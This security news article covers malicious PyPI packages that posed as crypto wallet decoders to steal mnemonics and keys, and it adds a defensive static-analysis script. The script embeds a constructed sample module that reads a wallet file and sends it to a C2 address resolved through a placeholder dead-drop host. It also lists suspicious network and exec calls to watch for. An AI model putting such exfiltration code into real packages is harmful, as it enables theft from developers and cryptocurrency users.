A new set of malicious packages has been unearthed in the Python Package Index (PyPI) repository that masqueraded as cryptocurrency wallet recovery and management services, only to siphon sensitive data and facilitate the theft of valuable digital assets.
"The attack targeted users of Atomic, Trust Wallet, Metamask, Ronin, TronLink, Exodus, and other prominent wallets in the crypto ecosystem," Checkmarx researcher Yehuda Gelb said in a Tuesday analysis.
"Presenting themselves as utilities for extracting mnemonic phrases and decrypting wallet data, these packages appeared to offer valuable functionality for cryptocurrency users engaged in wallet recovery or management."
However, they harbor functionality to steal private keys, mnemonic phrases, and other sensitive wallet data, such as transaction histories or wallet balances. Each of the packages attracted hundreds of downloads before it was taken down:
- atomicdecoderss (366 downloads)
- trondecoderss (240 downloads)
- phantomdecoderss (449 downloads)
- trustdecoderss (466 downloads)
- exodusdecoderss (422 downloads)
- walletdecoderss (232 downloads)
- ccl-localstoragerss (335 downloads)
- exodushcates (415 downloads)
- cipherbcryptors (450 downloads)
- ccl_leveldbases (407 downloads)
Checkmarx said the packages were named so in a deliberate attempt to lure developers working in the cryptocurrency ecosystem. In a further attempt to lend legitimacy to the libraries, the package descriptions on PyPI came with installation instructions, usage examples, and in one case, even "best practices" for virtual environments.
The deception didn't stop there, for the threat actor behind the campaign also managed to display fake download statistics, giving users the impression that the packages were popular and trustworthy.
Six of the identified PyPI packages pulled in a dependency called cipherbcryptors to execute the malicious code, while a few others relied on an additional package named ccl_leveldbases in an apparent effort to obfuscate the functionality by splitting it across packages.
A notable aspect of the packages is that the malicious functionality is triggered only when certain functions are called, marking a departure from the typical pattern where such behavior is activated automatically upon installation (for example from setup.py). A consequence is that dynamic analysis which only observes `pip install`, or only imports the module, sees nothing; the code has to be inspected statically or exercised the way a victim would use it. The captured data is then exfiltrated to a remote server.
"The attacker employed an additional layer of security by not hard-coding the address of their command and control server within any of the packages," Gelb said. "Instead, they used external resources to retrieve this information dynamically."
This technique, known as a dead drop resolver (MITRE ATT&CK T1102.001), gives the attackers the flexibility to update the server information without having to push out an update to the packages themselves. It also makes switching to different infrastructure easy should the servers be taken down, and it means that a static indicator search for a hard-coded C2 hostname in the package source will come up empty.
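The two properties just described, call-time rather than install-time triggering and a destination that is resolved at runtime instead of being hard-coded, both defeat the cheapest checks a defender runs on a suspicious package. The following is an added example (not code from the article or from Checkmarx) of the kind of static triage a practitioner can run over an unpacked sdist: it walks the Python AST, records where each sensitive call sits (module level, i.e. import time, or inside a function, i.e. only when called), and flags network calls whose destination is not a literal string. The sample module it analyses is constructed for this example; the hostname in it is a placeholder, not real infrastructure from the campaign, and the list of suspicious calls is an assumption you would tune for your environment.

```python
"""Static triage of a Python package for deferred, dynamically-resolved suspicious calls."""
from __future__ import annotations

import ast
from dataclasses import dataclass

# Constructed sample module that mirrors the pattern described above: nothing
# runs at import time, the C2 address is fetched from an external page (dead
# drop), and exfiltration only happens when the victim calls decode_wallet().
# The hostname is a placeholder for this example, not a real indicator.
SAMPLE_SOURCE = '''
import base64
import json
import urllib.request

def _resolve_c2():
    # dead drop resolver: the real server address lives on an external page
    page = urllib.request.urlopen("https://paste.example/raw/abc").read()
    return base64.b64decode(page).decode()

def decode_wallet(path):
    with open(path, "rb") as fh:
        data = fh.read()
    urllib.request.urlopen(_resolve_c2(), data=data)
    return data
'''

# Assumed watch-list; extend with whatever your organisation considers risky.
NETWORK_CALLS = {"urllib.request.urlopen", "requests.get", "requests.post", "socket.create_connection"}
OTHER_CALLS = {"base64.b64decode", "subprocess.Popen", "subprocess.run", "os.system", "exec", "eval"}
SUSPICIOUS_CALLS = NETWORK_CALLS | OTHER_CALLS


@dataclass
class Finding:
    call: str
    line: int
    scope: str          # "module" means import time; otherwise the enclosing function
    dynamic_dest: bool  # network call whose first argument is not a string literal


def _dotted_name(node: ast.AST) -> str | None:
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


class _Visitor(ast.NodeVisitor):
    def __init__(self) -> None:
        self.scope = ["module"]
        self.findings: list[Finding] = []

    def visit_FunctionDef(self, node: ast.FunctionDef) -> None:
        self.scope.append(node.name)   # everything below only runs when this is called
        self.generic_visit(node)
        self.scope.pop()

    visit_AsyncFunctionDef = visit_FunctionDef

    def visit_Call(self, node: ast.Call) -> None:
        name = _dotted_name(node.func)
        if name in SUSPICIOUS_CALLS:
            dynamic = (
                name in NETWORK_CALLS
                and bool(node.args)
                and not isinstance(node.args[0], ast.Constant)
            )
            self.findings.append(Finding(name, node.lineno, self.scope[-1], dynamic))
        self.generic_visit(node)


def triage(source: str) -> list[Finding]:
    """Return every suspicious call in `source` with its execution scope."""
    visitor = _Visitor()
    visitor.visit(ast.parse(source))
    return visitor.findings


def deferred_only(findings: list[Finding]) -> bool:
    """True when all suspicious calls are inside functions: an install-time or
    import-only sandbox would observe none of them."""
    return bool(findings) and all(f.scope != "module" for f in findings)


def has_dynamic_destination(findings: list[Finding]) -> bool:
    """True when some network call's target is computed at runtime (dead-drop style)."""
    return any(f.dynamic_dest for f in findings)


if __name__ == "__main__":
    found = triage(SAMPLE_SOURCE)
    for f in found:
        where = "import time" if f.scope == "module" else f"only when {f.scope}() is called"
        flag = "  [dynamic destination]" if f.dynamic_dest else ""
        print(f"line {f.line:>3}: {f.call:<28} {where}{flag}")
    print("deferred only:", deferred_only(found), "| dynamic C2:", has_dynamic_destination(found))
```

Run against the sample, the script reports three calls, all inside functions, and marks the exfiltration `urlopen` as having a non-literal destination; a package like this would pass an install-time sandbox and a grep for hostnames but fails both checks here. The same triage over a module that calls `os.system` at top level reports scope "module", which is the classic install-time pattern the article contrasts this campaign with.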
"The attack exploits the trust in open-source communities and the apparent utility of wallet management tools, potentially affecting a broad spectrum of cryptocurrency users," Gelb said.
"The attack's complexity – from its deceptive packaging to its dynamic malicious capabilities and use of malicious dependencies – highlights the importance of comprehensive security measures and continuous monitoring."
The development is just the latest in a series of malicious campaigns targeting the cryptocurrency sector, with threat actors constantly on the lookout for new ways to drain funds from victim wallets.
In August 2024, details emerged of a sophisticated cryptocurrency scam operation dubbed CryptoCore that involves using fake videos or hijacked accounts on social media platforms like Facebook, Twitch, X, and YouTube to lure users into parting with their cryptocurrency assets under the guise of quick and easy profits.
"This scam group and its giveaway campaigns leverage deepfake technology, hijacked YouTube accounts, and professionally designed websites to deceive users into sending their cryptocurrencies to the scammers' wallets," Avast researcher Martin Chlumecký said.
"The most common method is convincing a potential victim that messages or events published online are official communication from a trusted social media account or event page, thereby piggybacking on the trust associated with the chosen brand, person, or event."
Then last week, Check Point shed light on a rogue Android app that impersonated the legitimate WalletConnect open-source protocol to steal approximately $70,000 in cryptocurrency by initiating fraudulent transactions from infected devices.